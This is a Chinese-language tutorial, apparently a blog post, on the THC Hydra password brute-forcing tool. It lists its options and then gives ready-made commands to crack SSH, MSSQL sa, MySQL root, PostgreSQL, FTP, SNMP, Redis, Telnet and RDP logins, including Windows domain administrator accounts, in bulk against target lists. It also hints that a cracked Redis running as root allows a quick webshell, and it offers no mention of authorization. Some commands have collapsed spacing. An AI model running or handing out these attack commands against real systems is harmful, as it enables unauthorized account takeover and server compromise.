Hydra 是著名组织 thc 的一款开源的暴力破解密码工具、功能非常强大,几乎支持所有协议的在线破解。linux 版和 windows 版的 hydra 在使用上几乎是一样的(kali 默认安装)。
下载地址:https://github.com/vanhauser-thc/thc-hydra
hydra使用语法:
Hydra 参数 IP 服务参数说明:
-l login 小写,指定用户名进行破解-Lfile 大写,指定用户的用户名字典-p pass 小写,用于指定密码破解,很少使用,一般采用密码字典。-Pfile 大写,用于指定密码字典。-s 指定非默认端口-e ns 额外的选项,n:空密码试探,s:使用用户名作为密码试探-Mfile 指定目标ip列表文件,批量破解。-o file 指定结果输出文件-f 找到第一对登录名或者密码的时候中止破解。-t tasks 同时运行的线程数,默认是16-T所有IP总共用多少进程来跑。-w time 设置最大超时时间,单位-v/-V显示详细过程[-vV显示详细测试过程(常用)]-R恢复爆破(如果破解中断了,下次执行 hydra-R/path/to/hydra.restore 就可以继续任务。)-x 自定义密码。爆破 ssh 密码
hydra-Luser.txt-Ppassword.txt-t8-vV-ens192.168.154.131ssh爆破成功会提示 password found
使用 -o 选项保存文件。
hydra-Luser.txt-Ppassword.txt-ens-t8-vV-ores.txt192.168.154.131ssh爆破 ssh 的 root 密码
centos6 以后 root 弱口令已比较少了,centos5以前的系统还是很靠谱的。支持基于证书登陆的ssh爆破。
除了linux一些路由交换设备的ssh也可以尝试。
hydra-lroot-Ppwd.txt-ens-f-ossh_res.txt-t8-T16-w20-vVssh://192.168.5.16批量爆破 mssql
hydra-Luser.txt-Ppassword.txt-ens-f-ores.txt-Mtarget.txt-t8-T16-w20-vVmssql批量爆破 mssql 的sa 密码
hydra-lsa-Ppassword.txt-ens-f-ores.txt-Mtarget.txt-t8-T16-w20-vVmssql爆破 mysql 的 root 密码
hydra-lroot-Ppwd.txt-ens-f-omysql_res.txt-Mtarget_mysql.txt-t8-T16-w20-vVmysql爆破 postgresql 的 postgres 密码。
类似 mysql
hydra-lpostgres-P/tmp/wordsdict/pwd.txt-ens-f-opg_res.txt-Mpostgres_login.txt-t8-T16-w20-vVpostgresFTP 协议破解
hydra-Luser.txt-Ppassword.txt-ens-f-oftp_res.txt-t8-T16-w20-vVftp://192.168.5.16扫描SNMP弱口令
hydra-Ppwd.txt-Mip.txt-osave.log snmp-P 指定密码字典,-M指定目标IP文件(一行一个IP地址),-o指定结果输出文件,最后指定扫描协议SNMP。
爆破 redis 弱口令
redis 只需要指定密码字典文件。 用户名留空即可。
运气比较好, 目标机器 redis 是以 root 权限在运行的话 getshell 就很快了,参考文章利用redis写webshell。
hydra-Ppwd.txt-ens-f-oredis_res.txt-t8-T16-w20-vVredis://192.168.5.16爆破 win/linux 的 telnet
某些路由交换设备上可能会使用telnet服务
hydra-ladministrator-Ppwd.txt-ens-f-otelnet_res.txt-Mtelnet_login.txt-t8-T16-w20-vVtelnethydra-lroot-Ppwd.txt-ens-f-otelnet_res.txt-Mtelnet_login.txt-t8-T16-w20-vVtelnet爆破 windows rdp 管理密码
一旦爆破成功它会尝试登陆 一次, 如果你爆的那个用户当前正在线, 后果就是直接把对方蹬出去。
最好用最新版的 windows 平台的 hydra,而不是kali的。
hydra-ladministrator-Ppwd.txt-ens-f-ordp_res.txt-t4-w20-vVrdp://192.168.5.16上面只是爆破目标 windows 的本地管理员密码, 我们也可以直接用它来爆破指定的域用户密码
hydra-lrootkit\\administrator-Ppasswd.txt-ens-f-ordp_res.txt-t4-w20-vVrdp://192.168.5.16